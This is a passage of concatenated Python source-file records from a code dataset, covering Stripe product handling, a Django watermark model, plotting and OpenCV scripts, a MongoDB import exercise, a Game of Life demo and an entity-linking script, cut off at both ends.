None\n\ndef delete(product):\n \"\"\"\n delete a product\n\n Args:\n product: the product to delete\n \"\"\"\n stripe_product = stripe.Product.retrieve(product.stripe_id)\n stripe_product.delete()\n product.delete()","sub_path":"pinax/stripe/actions/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":6356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"621338736","text":"from math import sin, pi\r\nfrom random import random\r\nimport time\r\nimport urllib\r\nimport urllib2\r\nimport argparse\r\nimport logging\r\n\r\nlogging.basicConfig()\r\nlogger = logging.getLogger('simulator')\r\nlogger.setLevel(logging.INFO)\r\n\r\n\r\ndef generate_values(without_outliers=False):\r\n sample_size = 1400\r\n amplitude = 1.0\r\n freq = 450.0\r\n amp = 1.0\r\n framerate = 44100\r\n sample = []\r\n\r\n clamp = lambda x, minval, maxval: max(minval, min(maxval, x))\r\n\r\n for i in range(sample_size):\r\n i = float(i)\r\n val = amp * sin(2.0 * pi * freq * (i / framerate))\r\n val += (amplitude * 2) + (random())\r\n sample.append(val)\r\n\r\n if not without_outliers:\r\n outlier_point = clamp(int(sample_size * random()), int(sample_size / 2), int(sample_size - sample_size / 10))\r\n bad_value_count = clamp(int(40 * random()), 10, 40)\r\n bad_multipler = clamp(3.0 * random(), 1.5, 2.0)\r\n for i in range(bad_value_count):\r\n sample[outlier_point + i] *= bad_multipler\r\n\r\n return sample\r\n\r\n\r\ndef generate_server_streams(server_count=1, without_outliers=False):\r\n assert server_count > 0\r\n all = []\r\n for i in range(server_count):\r\n server_id = i + 1\r\n values = generate_values(without_outliers)\r\n all.append([(server_id, v) for v in values])\r\n\r\n result = []\r\n for idx, payload in enumerate(all[0]):\r\n for dataset in all:\r\n result.append(dataset[idx])\r\n\r\n return result\r\n\r\n\r\ndef run_simulator(endpoint_url, server_count=2, without_outliers=False):\r\n values = generate_server_streams(server_count, without_outliers)\r\n for idx, payload in enumerate(values):\r\n (server_id, val) = payload\r\n logger.info(\"Sending datapoint %d..\" % (idx + 1))\r\n params = {\r\n 'server': server_id,\r\n 'value': val\r\n }\r\n params = urllib.urlencode(params)\r\n req = urllib2.Request(endpoint_url, params)\r\n response = urllib2.urlopen(req)\r\n output = response.read()\r\n logger.info(\"Server response: %s\" % (output))\r\n time.sleep(2)\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Generate coding test time values')\r\n parser.add_argument('endpoint', type=str,\r\n help='URL of your webservice endpoint')\r\n parser.add_argument('--servers', type=int, default=2,\r\n help='Number of servers to receive datapoints from')\r\n parser.add_argument('--no-outliers', action='store_true',\r\n help='Simulate timeseries without outliers')\r\n\r\n args = parser.parse_args()\r\n run_simulator(args.endpoint, args.servers, args.no_outliers)\r\n\r\n\r\n","sub_path":"server-monitor-django/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"269653564","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom PIL import Image, ImageDraw, ImageFont\n\n\n# Create your models here.\n\n# Algorithm for adding Watermark to Image\ndef watermark_image_with_text(filename):\n print(filename)\n if \".TIF\" in str(filename):\n print('error Occoured')\n raise ValidationError(\"Error \")\n else:\n print('Alright')\n text = 'Arthub watermark'\n color = 'blue'\n fontfamily = 'arial.ttf'\n image = Image.open(filename).convert('RGBA')\n imageWatermark = Image.new('RGBA', image.size, (255, 255, 255, 0))\n draw = ImageDraw.Draw(imageWatermark)\n width, height = image.size\n font = ImageFont.truetype(fontfamily, int(height / 20))\n textWidth, textHeight = draw.textsize(text, font)\n x = width / 5\n y = height / 6\n draw.text((x, y), text, color, font)\n my_image = Image.alpha_composite(image, imageWatermark)\n my_image.convert('RGB').save('D:\\Github\\PicMesh\\media\\water_'+filename.name + '.png')\n return 'D:\\Github\\PicMesh\\media\\water_'+filename.name + '.png'\n\n# Model for Photo which contains details of Photos such as name, id, format,etc\nclass Photo(models.Model):\n format_of_tags = (\n ('PNG', 'PNG'),\n ('JPG', 'JPG'),\n ('JPEG', 'JPEG'),\n ('Exif', 'Exif'),\n ('TIF', 'TIF'),\n ('GIF', 'GIF'),\n ('WEBP', 'WEBP'),\n ('SVG', 'SVG'),\n )\n title = models.CharField(max_length=150)\n format = models.CharField(max_length=20, choices=format_of_tags, blank=False)\n tags = models.CharField(max_length=250)\n original_pic = models.ImageField()\n display_pic = models.ImageField(null=True, blank=True)\n description = models.CharField(max_length=1000)\n price = models.PositiveIntegerField()\n photographer = models.ForeignKey('Photographer', on_delete=models.CASCADE)\n category = models.ForeignKey('Categories', on_delete=models.CASCADE, default=0)\n class Meta:\n verbose_name= 'art'\n verbose_name_plural= 'arts'\n\n # Overwrites save method and set value of display_pic by default\n def save(self, *args, **kwargs):\n print(self.original_pic)\n if not self.pk:\n rotate_img_name = watermark_image_with_text(self.original_pic)\n else:\n rotate_img_name = self.display_pic\n self.display_pic = rotate_img_name\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title # this Function adds name as Given Title\n\n\n# Model for Photo which contains details of Photographer\nclass Photographer(models.Model):\n photographer_name = models.CharField(max_length=150)\n profile_pic = models.ImageField(default='default-profile.png')\n city = models.CharField(max_length=50)\n email_id = models.EmailField()\n details = models.CharField(max_length=1000)\n class Meta:\n verbose_name= 'artist'\n verbose_name_plural= 'artists'\n\n def __str__(self):\n return self.photographer_name # this Function adds name as Given Name of Photographer\n\n\n# Model for Photo which contains details of Category\nclass Categories(models.Model):\n category_name = models.CharField(max_length=200)\n category_description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.category_name\n\n\n# Model for Photo which contains details of Collection of user\nclass Coll(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, unique=False)\n photo = models.ForeignKey('Photo', on_delete=models.CASCADE, unique=False)\n\n def __str__(self):\n return self.photo.title\n\n\n# Model for Photo which contains details of Order table\nclass Order(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, unique=False)\n photo = models.ForeignKey('Photo', on_delete=models.CASCADE, unique=False)\n order_date = models.DateField(auto_now=True)\n\n def __str__(self):\n return str(self.user)\n","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"466742845","text":"#导入模块pyplot,并给它指定别名plt\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nzhfont = mpl.font_manager.FontProperties(fname='/etc/msyh.ttf')\n\n\n\n#input_values = [1,2,3,4,5]\n#squares = [1,4,9,16,25]\n#plt.plot(input_values, squares, linewidth=5)\n\n##设置图表标题,并给坐标轴加上标签\n#plt.title('Square Numbers', fontsize=24)\n#plt.xlabel('Value', fontsize=15)\n#plt.ylabel('Square of Value', fontsize=15)\n\n## 设置刻度标记的大少\n#plt.tick_params(axis='both', which='major', labelsize=15)\n#plt.scatter(2,1,)\n#plt.show()\n\n#plt.scatter(x_values, y_values, edgecolor='none',)\n\nx_values = list(range(1, 1001))\ny_values = [x**2 for x in x_values]\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Reds, edgecolor='none', s=5)\n\n#设置图表标题,并给坐标轴加上标签\nplt.title('中国', fontproperties=zhfont, fontsize=24)\nplt.xlabel('年代', fontproperties=zhfont, fontsize=15)\nplt.ylabel('人口', fontproperties=zhfont, fontsize=15)\n\n# 设置刻度标记的大少\nplt.tick_params(axis='both', which='major', labelsize=10)\n\n#\nplt.axis([0, 1100, 0, 1100000])\nplt.savefig('/home/qyl/桌面/002.png', bbox_inches='tight')\n","sub_path":"Python_World/数据可视化/mpl_squares.py","file_name":"mpl_squares.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"502731298","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('images/faces.png', -1)\n\nface_cascade = cv2.CascadeClassifier('/Users/lukasmaly/Development/opencv/data/haarcascades/haarcascade_frontalface_default.xml')\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\ni = 0\n\nfor (x, y, w, h) in faces:\n face = img[y:y + h, x:x + w]\n cv2.imshow('Face ' + str(i), face)\n cv2.imwrite('output/face' + str(i) + '.png', face)\n i += 1\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"FaceRecognition/faceextraction.py","file_name":"faceextraction.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"432374698","text":"# Databricks notebook source\n\nSTORAGE_ACCOUNT_NAME = dbutils.secrets.get(scope=\"eim-dbrx\", key=\"intg-cscentstorage-account-name\")\nSTORAGE_CONTAINER = 'rgisoutboundfiles'\nSTORAGE_KEY = dbutils.secrets.get(scope=\"eim-dbrx\", key=\"intg-cscentstorage-storage-key\")\nSTORAGE_ACCOUNT_ENV = STORAGE_ACCOUNT_NAME + \".blob.core.windows.net\"\nSTORAGE_FOLDER = \"rgisoutboundfiles\"\n\n# COMMAND ----------\n\n## Connection string to connect to blob storage\nspark.conf.set(\n \"fs.azure.account.key.\"+STORAGE_ACCOUNT_NAME+\".blob.core.windows.net\",\n STORAGE_KEY)\n\n# COMMAND ----------\n\nfrom datetime import datetime\nimport pytz\nmnt = \"/mnt/entadls\"\nDLLocation = mnt+\"/curated/internal/product/rgis/\"\nDLLocationArchive = mnt+\"/curated/internal/product/rgis/archive/\"\nfileName = \"RGISStoreLocations.csv\"\ntodaydate = datetime.now(tz=pytz.utc).astimezone(timezone('US/Pacific')).strftime('%Y-%m-%d')\nNewFileName = \"RGISStoreLocations\"+todaydate+\".csv\"\nFileLocation = \"wasbs://\"+STORAGE_CONTAINER+\"@\"+STORAGE_ACCOUNT_ENV\ncontainerfiles = dbutils.fs.ls(FileLocation)\nDLFiles = dbutils.fs.ls(DLLocation)\nfor file in containerfiles:\n if fileName in file.name:\n print(f'File {fileName} exists')\n #Archive the existing file in DL\n for DLfile in DLFiles:\n if fileName in DLfile.name:\n dbutils.fs.mv(DLLocation+fileName, DLLocationArchive+NewFileName)\n #Copy file from the container to DL\n dbutils.fs.cp(file.path, DLLocation)\n","sub_path":"C1-SIT3/mplk_automation/rgis/RGIS_Outbound_Store_Locations.py","file_name":"RGIS_Outbound_Store_Locations.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"238291805","text":"# This file is part of the lib3to6 project\n# https://gitlab.com/mbarkhau/lib3to6\n#\n# Copyright (c) 2019 Manuel Barkhau (mbarkhau@gmail.com) - MIT License\n# SPDX-License-Identifier: MIT\n\nimport os\nimport sys\nimport shutil\nimport tempfile\nimport typing as typ\nimport hashlib as hl\nimport pathlib2 as pl\n\nfrom . import transpile\nfrom . import common\n\n\nENV_PATH = str(pl.Path(sys.executable).parent.parent)\n\n\nPYTHON_TAG_PREFIXES = {\n 'py': \"Generic Python\",\n 'cp': \"CPython\",\n 'ip': \"IronPython\",\n 'pp': \"PyPy\",\n 'jy': \"Jython\",\n}\n\n\nCACHE_DIR = pl.Path(tempfile.gettempdir()) / \".lib3to6_cache\"\n\n\ndef eval_build_config() -> common.BuildConfig:\n # TODO (mb 2018-06-07): Get options from setup.cfg\n # python_tags = \"py2.py3\"\n # for argi, arg in enumerate(sys.argv):\n # if \"--python-tag\" in arg:\n # if \"=\" in arg:\n # python_tags = arg.split(\"=\", 1)[-1]\n # else:\n # python_tags = sys.argv[argi + 1]\n\n return {'target_version': \"2.7\", 'force_transpile': \"1\", 'fixers': \"\", 'checkers': \"\"}\n\n\ndef _ignore_tmp_files(src: str, names: typ.List[str]) -> typ.List[str]:\n if src.endswith(\"build\"):\n return names\n if src.endswith(\"dist\"):\n return names\n if src.endswith(\"__pycache__\"):\n return names\n return [name for name in names if name.endswith(\".pyc\")]\n\n\ndef init_build_package_dir(local_package_dir: common.PackageDir) -> common.PackageDir:\n output_dir = pl.Path(\"build\") / \"lib3to6_out\"\n try:\n output_dir.mkdir(parents=True)\n except Exception:\n # forgiveness > permission\n pass\n\n build_package_dir: common.PackageDir = {}\n\n for package, src_package_dir in local_package_dir.items():\n # TODO (mb 2018-08-25): Make sure src_package_dir is a\n # relative path.\n is_abs_path = pl.Path(src_package_dir) == pl.Path(src_package_dir).absolute()\n if is_abs_path:\n raise Exception(f\"package_dir must use relative paths, got '{src_package_dir}'\")\n\n build_package_subdir = output_dir / src_package_dir\n\n # TODO (mb 2018-08-25): As an optimization, we could\n # restrict deletion to files that we manipulate, in\n # other words, to *.py files.\n if build_package_subdir.exists():\n shutil.rmtree(build_package_subdir)\n\n shutil.copytree(src_package_dir, str(build_package_subdir), ignore=_ignore_tmp_files)\n\n build_package_dir[package] = str(build_package_subdir)\n\n return build_package_dir\n\n\ndef build_package(cfg: common.BuildConfig, package: str, build_dir: str) -> None:\n for root, _dirs, files in os.walk(build_dir):\n for filename in files:\n filepath = pl.Path(root) / filename\n if filepath.suffix != \".py\":\n continue\n\n with open(filepath, mode=\"rb\") as fh:\n module_source_data = fh.read()\n\n filehash = hl.sha1(module_source_data).hexdigest()\n cache_path = CACHE_DIR / (filehash + \".py\")\n\n if int(cfg['force_transpile']) or not cache_path.exists():\n try:\n fixed_module_source_data = transpile.transpile_module_data(\n cfg, module_source_data\n )\n except common.CheckError as err:\n err.args = (err.args[0] + f\" of file {filepath} \",) + err.args[1:]\n raise\n\n with open(cache_path, mode=\"wb\") as fh:\n fh.write(fixed_module_source_data)\n\n shutil.copy(cache_path, filepath)\n\n\ndef build_packages(cfg: common.BuildConfig, build_package_dir: common.PackageDir) -> None:\n CACHE_DIR.mkdir(exist_ok=True)\n\n for package, build_dir in build_package_dir.items():\n build_package(cfg, package, build_dir)\n\n\ndef fix(package_dir: common.PackageDir = None) -> common.PackageDir:\n if package_dir is None:\n package_dir = {\"\": \".\"}\n\n build_package_dir = init_build_package_dir(package_dir)\n build_cfg = eval_build_config()\n build_packages(build_cfg, build_package_dir)\n return build_package_dir\n","sub_path":"src/lib3to6/packaging.py","file_name":"packaging.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"527710756","text":"import pgzrun # 导入游戏库\nimport random # 导入随机库\n\nTILE_SIZE = 20 # 小方块的大小,20*20\nWIDTH = 30*TILE_SIZE # 设置窗口的宽度 600\nHEIGHT = 30*TILE_SIZE # 设置窗口的高度 600\n\nCells = [] # 二维数组,开始为空列表,用于储存小方块编号\nfor i in range(30): # 对行遍历\n row = [] # 存储一行的数据,开始为空列表\n for j in range(30): # 对列遍历\n x = random.randint(0, 1)\n if i==0 or i==29 or j==0 or j==29:\n x = 0 # 边界处为0\n row.append(x) # 把数据添加到行列表row中\n Cells.append(row) # 再行列表row添加到二维数组Cells中\n\nTiles = [] # 二维数组,开始为空列表,存放所有小方块图片信息\ndef updateTiles(): # 根据Cells更新Tiles二维数组\n for i in range(30):\n for j in range(30):\n if Cells[i][j]==0:\n tile = Actor('die.jpg') # 对应小方块图片初始化\n if Cells[i][j]==1:\n tile = Actor('live.jpg') # 对应小方块图片初始化 \n tile.left = j * TILE_SIZE # 小方块图片最左边的x坐标\n tile.top = i * TILE_SIZE # 小方块图片最顶部的y坐标\n Tiles.append(tile) # 将当前小方块加入到列表中\n\ndef draw(): # 绘制模块,每帧重复执行\n screen.clear() # 每帧清除屏幕,便于重新绘制\n for tile in Tiles:\n tile.draw() # 绘制所有小方块\n\ndef update(): # 更新模块,每帧重复操作\n global Cells\n NewCells = Cells # 下一帧的细胞情况\n NeibourNumber = 0 # 统计临近细胞为生的个数\n for i in range(1,29): # 对行遍历\n for j in range(1,29): # 对列遍历\n NeibourNumber = Cells[i-1][j-1] + Cells[i-1][j] + Cells[i-1][j+1] \\\n + Cells[i][j-1] + Cells[i][j+1] \\\n + Cells[i+1][j-1] + Cells[i+1][j] + Cells[i+1][j+1]\n # 根据临近活着的细胞个数,统计下一帧对应的细胞状态\n if (NeibourNumber == 3):\n NewCells[i][j] = 1\n elif (NeibourNumber == 2):\n NewCells[i][j] = Cells[i][j]\n else:\n NewCells[i][j] = 0\n Cells = NewCells\n updateTiles() # 根据Cells更新Tiles二维数组\n\npgzrun.go() # 开始执行游戏","sub_path":"PygameZero/python游戏趣味编程代码/第11章/练习11-2.py","file_name":"练习11-2.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"352876067","text":"import numpy as np\nimport pprint\nimport pandas as pd\n#from sklearn import linear_model\nimport statsmodels.api as sm\n\nimport matplotlib.pyplot as plt\n\n#define my params\nslope = []\n\nintercept = []\n\n#start MC loop\n\nfor i in range(10000):\n\n\t#add noise\n\tX = np.arange(10) # [0,1,2]\n\t\n\tX = X + np.random.rand(10)\n\t\n\tY = np.arange(10)\n\t\n\t#model goes here\n\t\n\tX = sm.add_constant(X)\n\tmodel = sm.OLS(Y,X)\n\tresults = model.fit()\n\t\n\t#get params out of model\n\n\tslope.append(results.params[1])\n\tintercept.append(results.params[0])\n\n#plot intercept and slope\n\nplt.scatter(intercept, slope , marker='.' , alpha = '.1', c='r',)\n\n#plt.hist(intercept)\n\n#plt.grid(True)\n#plt.semilogy()\nplt.title(\"intercept vs slope\")\nplt.xlabel(\"intercept\")\nplt.ylabel(\"slope\")\n\nplt.show()","sub_path":"example_mc_fit.py","file_name":"example_mc_fit.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"260081997","text":"'''Adds products in a csv file to a MongoDB database'''\n# lesson 05: Consuming APIs\n\n# Checklist:\n# Create a product db with attributes that reflect the contents of the csv file\n# Import all data in the csv files into your MongoDB implementation\n# Write queries to retrieve the product database\n# Write a query to integrate customer and product data\n# no errors from pylint\n# quantity_available of '0' is understood as 'not available'\n# Create a test_database.py\n\n# pylint: disable=too-many-statements\n# pylint: disable=invalid-name\n# pylint: disable=too-many-locals\n\nimport logging\nimport csv\nimport os\nfrom pymongo import MongoClient\n# Set up logger\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\nclass MongoDBConnection():\n '''MongoDBConnection'''\n\n def __init__(self, host='127.0.0.1', port=27017):\n '''Be sure to use the ip address, not the name for local windows, intializes'''\n self.host = host\n self.port = port\n self.connection = None\n\n def __enter__(self):\n '''Enters connection?'''\n self.connection = MongoClient(self.host, self.port)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n '''Exits connection'''\n self.connection.close()\n\ndef import_data(directory_name, product_file, customer_file, rentals_file):\n '''\n Populate new MongoDB database using the three csv file inputs.\n Returns two tuples (1) record count of # of products, customers, rentals\n (2) count of any errors that occured\n '''\n product_error, customer_error, rentals_error = 0, 0, 0\n product_file_path = os.path.join(directory_name, product_file)\n customer_file_path = os.path.join(directory_name, customer_file)\n rentals_file_path = os.path.join(directory_name, rentals_file)\n\n mongo = MongoDBConnection()\n with mongo:\n db = mongo.connection.media\n\n # Create collections\n products = db['products']\n customers = db['customers']\n rentals = db['rentals']\n\n # Attempt to import product data file into MongoDB db, create product collection\n try:\n with open(product_file_path, encoding='utf-8-sig') as file:\n reader = csv.DictReader(file)\n for row in reader:\n add_product = {'p_id': row['p_id'],\n 'description': row['description'],\n 'product_type': row['product_type'],\n 'quantity_available': row['quantity_available']}\n try:\n products.insert_one(add_product) # Fixed to use correct method\n LOGGER.info('Product added!')\n except NameError:\n LOGGER.info('Error adding product to database')\n product_error += 1\n except FileNotFoundError:\n LOGGER.info('Product file not found.')\n product_error += 1\n\n # Attempt to import customer data into the MongoDB db, create customer collection\n try:\n with open(customer_file_path, encoding='utf-8-sig') as file:\n reader = csv.DictReader(file)\n for row in reader:\n add_customer = {'c_id': row['c_id'],\n 'name': row['name'],\n 'address': row['address'],\n 'phone_number': row['phone_number'],\n 'email': row['email']}\n try:\n customers.insert_one(add_customer)\n LOGGER.info('Customer added!')\n except NameError:\n LOGGER.info('Error adding customer to database')\n customer_error += 1\n except FileNotFoundError:\n LOGGER.info('Customer file not found.')\n customer_error += 1\n\n # Attempt to import rentals file into the MongoDB db, create rentals collection\n try:\n with open(rentals_file_path, encoding='utf-8-sig') as file:\n reader = csv.DictReader(file)\n for row in reader:\n add_rentals = {'r_id': row['r_id'],\n 'p_id': row['p_id'],\n 'c_id': row['c_id']}\n try:\n rentals.insert_one(add_rentals)\n LOGGER.info('Rentals added!')\n except NameError:\n LOGGER.info('Error adding rentals to database')\n rentals_error += 1\n except FileNotFoundError:\n LOGGER.info('Rentals file not found.')\n rentals_error += 1\n\n # Return the sum of each record type and the sum of each error in 2 tuples\n record_count = (products.count_documents({}), customers.count_documents({}),\n rentals.count_documents({}))\n fail_count = (product_error, customer_error, rentals_error)\n\n return record_count, fail_count\n#\ndef show_available_products():\n '''Return a dictionary of products listed as available'''\n mongo = MongoDBConnection()\n available_products = {}\n with mongo:\n db = mongo.connection.media\n for each in db.products.find({'quantity_available': {'$gt': '0'}}):\n # ''$gt' selects those documents where the value of the field\n # is greater than specfied value AKA 'not available'\n product_info = {'description': each['description'],\n 'product_type': each['product_type'],\n 'quantity_available': each['quantity_available']}\n available_products[each['p_id']] = product_info\n\n return available_products\n\ndef show_rentals(p_id):\n '''Return a dictionary with info from users that have rented with the product id'''\n mongo = MongoDBConnection()\n rental_list = {}\n with mongo:\n db = mongo.connection.media\n for each in db.rentals.find({'p_id': p_id}):\n for pers in db.customers.find({'c_id': each['c_id']}):\n rental_list[pers['c_id']] = {'name': pers['name'],\n 'address': pers['address'],\n 'phone_number': pers['phone_number'],\n 'email': pers['email']}\n\n\n return rental_list\n\ndef clear_all():\n '''Clears all database collections'''\n mongo = MongoDBConnection()\n with mongo:\n db = mongo.connection.media\n\n db.products.drop()\n db.customers.drop()\n db.rentals.drop()\n LOGGER.info('Cleared all databases!')\n","sub_path":"students/chelsea_nayan/lesson07/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"499269972","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pickle\nimport matplotlib\nimport numpy as np\n\nzhfont= matplotlib.font_manager.FontProperties(fname=r'C:\\Windows\\Fonts\\simhei.ttf',size=14)\n\nif __name__ == '__main__':\n with open('sumData.txt', 'r') as f:\n sumOfCost_boys = float(f.readline())\n sumOfCost_girls = float(f.readline())\n sumOfDiscount = float(f.readline())\n sumOfImvlidOrders = float(f.readline())\n sumOfAidouOrders_boys = float(f.readline())\n sumOfAidouOrders_girls = float(f.readline())\n sumOfChangfenOrders_girls = float(f.readline())\n sumOfChangfenOrders_girls = float(f.readline())\n maxCost_singleTime = float(f.readline())\n maxCost_total = float(f.readline())\n maxCostTotalCustomer = float(f.readline())\n maxCountOfOrders = float(f.readline())\n maxCountOfOrdersCustomer = float(f.readline())\n\n f = open('ordersEachMonth', 'rb')\n ordersEachMonth = pickle.load(f)\n f.close()\n\n x = [str(k)+\"月份\" for k in ordersEachMonth.keys()]\n y = [ordersEachMonth[k] for k in \n ordersEachMonth.keys()]\n x.reverse()\n y.reverse()\n sns.set_style(\"darkgrid\")\n sns.set(font=\"simhei\")\n bar_plot = sns.barplot(x=x,y=y,\n palette=\"muted\")\n plt.show()\n\n f = open('ordersEachCustomer', 'rb')\n ordersEachCustomer = pickle.load(f)\n f.close()\n\n f = open('dataForEachFood_boys', 'rb')\n dataForEachFood_boys = pickle.load(f)\n f.close()\n\n x = [k for k in dataForEachFood_boys.keys()]\n y = [dataForEachFood_boys[k].count for k in \n dataForEachFood_boys.keys()]\n sns.set_style(\"darkgrid\")\n sns.set(font=\"simhei\")\n bar_plot = sns.barplot(x=y,y=x,\n palette=\"muted\")\n plt.xticks(rotation=0)\n plt.show()\n\n f = open('dataForEachFood_girls', 'rb')\n dataForEachFood_girls = pickle.load(f)\n f.close()\n\n f = open('costPartition', 'rb')\n costPartition = pickle.load(f)\n f.close()\n\n f = open('timePartition', 'rb')\n timePartition = pickle.load(f)\n f.close()\n \n with open('dormitoryPartition_orders', 'rb') as f:\n dormitoryPartition_orders = pickle.load(f)\n \n with open('dormitoryPartition_cost', 'rb') as f:\n dormitoryPartition_cost = pickle.load(f)","sub_path":"dataview.py","file_name":"dataview.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"465940449","text":"\n# coding: utf-8\n\n# In[7]:\n\nimport os\nimport sys\nimport argparse\nimport pickle\nimport math\nimport unicodedata\nimport pandas as pd\nimport numpy as np\n\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\nfrom nltk.corpus import stopwords\n\n\n# In[8]:\n\n# arguments\nindex_entpath = \"../indexes/entity_2M.pkl\"\nindex_reachpath = \"../indexes/reachability_2M.pkl\"\nindex_namespath = \"../indexes/names_2M.pkl\"\n\ntrain_ent_resultpath = \"../entity_detection/query-text/train.txt\"\ntrain_gold_ent_resultpath = \"../entity_detection/gold-query-text/train.txt\"\ntrain_rel_resultpath = \"../relation_prediction/results/topk-retrieval-train-hits-3.txt\"\n\nvalid_ent_resultpath = \"../entity_detection/query-text/valid.txt\"\nvalid_gold_ent_resultpath = \"../entity_detection/gold-query-text/valid.txt\"\nvalid_rel_resultpath = \"../relation_prediction/results/topk-retrieval-valid-hits-3.txt\"\n\n\n\n# In[9]:\n\ntokenizer = TreebankWordTokenizer()\nstopwords = set(stopwords.words('english'))\n\ndef tokenize_text(text):\n tokens = tokenizer.tokenize(text)\n return tokens\n\ndef www2fb(in_str):\n if in_str.startswith(\"www.freebase.com\"):\n return 'fb:%s' % (in_str.split('www.freebase.com/')[-1].replace('/', '.'))\n return in_str\n\ndef get_index(index_path):\n print(\"loading index from: {}\".format(index_path))\n with open(index_path, 'rb') as f:\n index = pickle.load(f)\n return index\n\ndef strip_accents(text):\n return ''.join(c for c in unicodedata.normalize('NFKD', text) if unicodedata.category(c) != 'Mn')\n\n\n# In[10]:\n\ndef get_query_texts(ent_resultpath):\n print(\"getting query text...\")\n lineids = []\n id2query = {}\n notfound = 0\n with open(ent_resultpath, 'r') as f:\n for line in f:\n items = line.strip().split(\" %%%% \")\n try:\n lineid = items[0].strip()\n queries = items[1:]\n # mid = items[2].strip()\n except:\n # print(\"ERROR: line does not have >2 items --> {}\".format(line.strip()))\n notfound += 1\n continue\n # print(\"{} - {}\".format(lineid, query))\n lineids.append(lineid)\n id2query[lineid] = queries\n print(\"notfound (empty query text): {}\".format(notfound))\n return lineids, id2query\n\ndef get_relations(rel_resultpath):\n print(\"getting relations...\")\n lineids = []\n id2rels = {}\n with open(rel_resultpath, 'r') as f:\n for line in f:\n items = line.strip().split(\" %%%% \")\n lineid = items[0].strip()\n rel = www2fb(items[1].strip())\n label = items[2].strip()\n score = items[3].strip()\n # print(\"{} - {}\".format(lineid, rel))\n if lineid in id2rels.keys():\n id2rels[lineid].append( (rel, label, score) )\n else:\n id2rels[lineid] = [(rel, label, score)]\n lineids.append(lineid)\n return lineids, id2rels\n\n\n# In[11]:\n\ndef find_ngrams(input_list, n):\n ngrams = zip(*[input_list[i:] for i in range(n)])\n return set(ngrams)\n\n\n# In[12]:\n\ndef pick_best_name(question, names_list):\n best_score = None\n best_name = None\n for name in names_list:\n score = fuzz.ratio(name, question)\n if best_score == None or score > best_score:\n best_score = score\n best_name = name\n\n return best_name\n\n\n# In[13]:\n\nrel_lineids, id2rels = get_relations(valid_rel_resultpath)\nent_lineids, id2queries = get_query_texts(valid_ent_resultpath) # ent_lineids may have some examples missing\ngold_ent_lineids, id2gold_query = get_query_texts(valid_gold_ent_resultpath) # ent_lineids may have some examples missing\n\n\n# In[15]:\n\ndef get_questions(datapath):\n print(\"getting questions...\")\n id2question = {}\n with open(datapath, 'r') as f:\n for line in f:\n items = line.strip().split(\"\\t\")\n lineid = items[0].strip()\n sub = items[1].strip()\n pred = items[2].strip()\n obj = items[3].strip()\n question = items[4].strip()\n # print(\"{} - {}\".format(lineid, question))\n id2question[lineid] = (sub, pred, question)\n return id2question\n\ndatapath = \"../data/SimpleQuestions_v2_modified/all.txt\"\nid2question = get_questions(datapath)\n\n\n# In[18]:\n\nnum_entities_fbsubset = 200000 # 2M - 1959820 , 5M - 1972702\nindex_ent = get_index(index_entpath)\nindex_reach = get_index(index_reachpath)\nindex_names = get_index(index_namespath)\n\n\n# In[24]:\n\ndef calc_tf_idf(question, query, cand_ent_name, cand_ent_count, num_entities, index_ent):\n query_terms = tokenize_text(cand_ent_name)\n doc_tokens = tokenize_text(question)\n common_terms = set(query_terms).intersection(set(doc_tokens))\n\n # len_intersection = len(common_terms)\n # len_union = len(set(query_terms).union(set(doc_tokens)))\n # tf = len_intersection / len_union\n tf = math.log10(cand_ent_count + 1)\n k1 = 0.5\n k2 = 0.5\n total_idf = 0\n for term in common_terms:\n df = len(index_ent[term])\n idf = math.log10( (num_entities + k1) / (df + k2) )\n total_idf += idf\n return tf * total_idf\n\ndef calc_idf(question, cand_ent_name, index_ent):\n query_terms = tokenize_text(cand_ent_name)\n doc_tokens = tokenize_text(question)\n common_terms = set(query_terms).intersection(set(doc_tokens))\n fix_terms = 80000\n total_idf = 